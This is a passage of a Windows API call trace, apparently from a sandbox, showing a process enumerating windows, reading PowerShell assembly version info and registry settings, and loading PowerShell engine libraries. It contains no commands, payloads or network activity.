	[0320.797] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x7e8
	[0320.797] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x730
	[0320.797] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x2c8
	[0320.797] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x31c
	[0320.797] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x330
	[0320.798] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x128
	[0320.798] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x5c8
	[0320.798] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x6f8
	[0320.798] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x358
	[0320.798] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x73c
	[0320.798] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xb0
	[0320.798] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x250
	[0320.798] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x240
	[0320.798] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x790
	[0320.799] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x61c
	[0320.799] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x568
	[0320.799] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x538
	[0320.799] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x540
	[0320.799] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x460
	[0320.799] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x79c
	[0320.799] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4e0
	[0320.799] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x460
	[0320.800] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x778
	[0321.256] WerSetFlags () returned 0x0
	[0321.264] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0321.264] CoTaskMemFree (pv=0x0) 
	[0321.265] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xadec8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xadec0 | out: pulNumLanguages=0xadec8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xadec0) returned 1
	[0321.265] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xadec8, pwszLanguagesBuffer=0x2d21458, pcchLanguagesBuffer=0xadec0 | out: pulNumLanguages=0xadec8, pwszLanguagesBuffer=0x2d21458, pcchLanguagesBuffer=0xadec0) returned 1
	[0321.271] CoTaskMemAlloc (cb=0x24) returned 0x25ec80
	[0321.271] GetUserDefaultLocaleName (in: lpLocaleName=0x25ec80, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0321.271] CoTaskMemFree (pv=0x25ec80) 
	[0321.732] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0321.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.732] CoTaskMemFree (pv=0x1b8a70) 
	[0321.734] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0321.734] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.734] CoTaskMemFree (pv=0x1b8a70) 
	[0321.736] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0321.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.736] CoTaskMemFree (pv=0x1b8a70) 
	[0321.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.746] SetErrorMode (uMode=0x1) returned 0x1
	[0321.746] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xadb40 | out: lpFileInformation=0xadb40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0321.746] SetErrorMode (uMode=0x1) returned 0x1
	[0321.747] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xaddb0 | out: lpdwHandle=0xaddb0) returned 0x94c
	[0321.748] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d24ce8 | out: lpData=0x2d24ce8) returned 1
	[0321.748] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xadd28, puLen=0xadd20 | out: lplpBuffer=0xadd28*=0x2d24d84, puLen=0xadd20) returned 1
	[0321.749] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xadc98, puLen=0xadc90 | out: lplpBuffer=0xadc98*=0x2d24e60, puLen=0xadc90) returned 1
	[0321.749] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0321.749] CoTaskMemAlloc (cb=0x2e) returned 0x258c50
	[0321.749] lstrcpyW (in: lpString1=0x258c50, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0321.749] CoTaskMemFree (pv=0x258c50) 
	[0321.749] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xadc98, puLen=0xadc90 | out: lplpBuffer=0xadc98*=0x2d24eb4, puLen=0xadc90) returned 1
	[0321.749] lstrlenW (lpString="System.Management.Automation") returned 28
	[0321.749] CoTaskMemAlloc (cb=0x3c) returned 0x2617b0
	[0321.749] lstrcpyW (in: lpString1=0x2617b0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0321.749] CoTaskMemFree (pv=0x2617b0) 
	[0321.749] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xadc98, puLen=0xadc90 | out: lplpBuffer=0xadc98*=0x2d24f10, puLen=0xadc90) returned 1
	[0321.749] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0321.749] CoTaskMemAlloc (cb=0x20) returned 0x25ece0
	[0321.749] lstrcpyW (in: lpString1=0x25ece0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0321.749] CoTaskMemFree (pv=0x25ece0) 
	[0321.749] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xadc98, puLen=0xadc90 | out: lplpBuffer=0xadc98*=0x2d24f50, puLen=0xadc90) returned 1
	[0321.749] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0321.749] CoTaskMemAlloc (cb=0x44) returned 0x2617b0
	[0321.749] lstrcpyW (in: lpString1=0x2617b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0321.749] CoTaskMemFree (pv=0x2617b0) 
	[0321.749] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xadc98, puLen=0xadc90 | out: lplpBuffer=0xadc98*=0x2d24fb8, puLen=0xadc90) returned 1
	[0321.749] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0321.749] CoTaskMemAlloc (cb=0x76) returned 0x200120
	[0321.749] lstrcpyW (in: lpString1=0x200120, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0321.749] CoTaskMemFree (pv=0x200120) 
	[0321.750] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xadc98, puLen=0xadc90 | out: lplpBuffer=0xadc98*=0x2d25054, puLen=0xadc90) returned 1
	[0321.750] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0321.750] CoTaskMemAlloc (cb=0x44) returned 0x2617b0
	[0321.750] lstrcpyW (in: lpString1=0x2617b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0321.750] CoTaskMemFree (pv=0x2617b0) 
	[0321.750] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xadc98, puLen=0xadc90 | out: lplpBuffer=0xadc98*=0x2d250b8, puLen=0xadc90) returned 1
	[0321.750] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0321.750] CoTaskMemAlloc (cb=0x58) returned 0x225f50
	[0321.750] lstrcpyW (in: lpString1=0x225f50, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0321.750] CoTaskMemFree (pv=0x225f50) 
	[0321.750] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xadc98, puLen=0xadc90 | out: lplpBuffer=0xadc98*=0x2d25134, puLen=0xadc90) returned 1
	[0321.750] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0321.750] CoTaskMemAlloc (cb=0x20) returned 0x25ece0
	[0321.750] lstrcpyW (in: lpString1=0x25ece0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0321.750] CoTaskMemFree (pv=0x25ece0) 
	[0321.750] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xadc98, puLen=0xadc90 | out: lplpBuffer=0xadc98*=0x2d24ddc, puLen=0xadc90) returned 1
	[0321.750] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0321.750] CoTaskMemAlloc (cb=0x66) returned 0x255020
	[0321.750] lstrcpyW (in: lpString1=0x255020, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0321.750] CoTaskMemFree (pv=0x255020) 
	[0321.750] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xadc98, puLen=0xadc90 | out: lplpBuffer=0xadc98*=0x0, puLen=0xadc90) returned 0
	[0321.751] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xadc98, puLen=0xadc90 | out: lplpBuffer=0xadc98*=0x0, puLen=0xadc90) returned 0
	[0321.751] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xadc98, puLen=0xadc90 | out: lplpBuffer=0xadc98*=0x0, puLen=0xadc90) returned 0
	[0321.751] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xadc68, puLen=0xadc60 | out: lplpBuffer=0xadc68*=0x2d24d84, puLen=0xadc60) returned 1
	[0321.751] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0321.751] VerLanguageNameW (in: wLang=0x0, szLang=0x202920, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0321.751] CoTaskMemFree (pv=0x202920) 
	[0321.751] VerQueryValueW (in: pBlock=0x2d24ce8, lpSubBlock="\\", lplpBuffer=0xadcb8, puLen=0xadcb0 | out: lplpBuffer=0xadcb8*=0x2d24d10, puLen=0xadcb0) returned 1
	[0321.759] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0321.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.759] CoTaskMemFree (pv=0x1b8a70) 
	[0321.760] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0321.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.760] CoTaskMemFree (pv=0x1b8a70) 
	[0321.761] lstrlenW (lpString="䅁") returned 1
	[0321.765] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xadb88 | out: phkResult=0xadb88*=0x2fc) returned 0x0
	[0321.766] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xadb78 | out: phkResult=0xadb78*=0x300) returned 0x0
	[0321.766] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xadc08 | out: phkResult=0xadc08*=0x304) returned 0x0
	[0322.238] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xadb4c, lpData=0x0, lpcbData=0xadb48*=0x0 | out: lpType=0xadb4c*=0x1, lpData=0x0, lpcbData=0xadb48*=0x56) returned 0x0
	[0322.239] CoTaskMemAlloc (cb=0x5a) returned 0x254fb0
	[0322.239] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xadb1c, lpData=0x254fb0, lpcbData=0xadb18*=0x56 | out: lpType=0xadb1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xadb18*=0x56) returned 0x0
	[0322.239] CoTaskMemFree (pv=0x254fb0) 
	[0322.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.272] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0322.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.272] CoTaskMemFree (pv=0x1b8a70) 
	[0323.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0323.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0324.879] CoTaskMemAlloc (cb=0x104) returned 0x1b8b80
	[0324.879] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.879] CoTaskMemFree (pv=0x1b8b80) 
	[0324.881] CoTaskMemAlloc (cb=0x104) returned 0x1b8b80
	[0324.881] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.881] CoTaskMemFree (pv=0x1b8b80) 
	[0324.905] CoTaskMemAlloc (cb=0x104) returned 0x1b8b80
	[0324.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.905] CoTaskMemFree (pv=0x1b8b80) 
	[0324.906] CoTaskMemAlloc (cb=0x104) returned 0x1b8b80
	[0324.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.906] CoTaskMemFree (pv=0x1b8b80) 
	[0324.906] CoTaskMemAlloc (cb=0x104) returned 0x1b8b80
	[0324.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.906] CoTaskMemFree (pv=0x1b8b80) 
	[0326.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0326.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0326.827] CoTaskMemAlloc (cb=0x104) returned 0x1b8b80
	[0326.827] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.827] CoTaskMemFree (pv=0x1b8b80) 
	[0326.830] CoTaskMemAlloc (cb=0x104) returned 0x1b8b80
	[0326.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.830] CoTaskMemFree (pv=0x1b8b80) 
	[0328.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0332.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0332.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0334.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0334.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0335.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0335.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0337.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0337.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0337.084] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0337.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0337.084] CoTaskMemFree (pv=0x1b8da0) 
	[0337.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0337.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0337.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
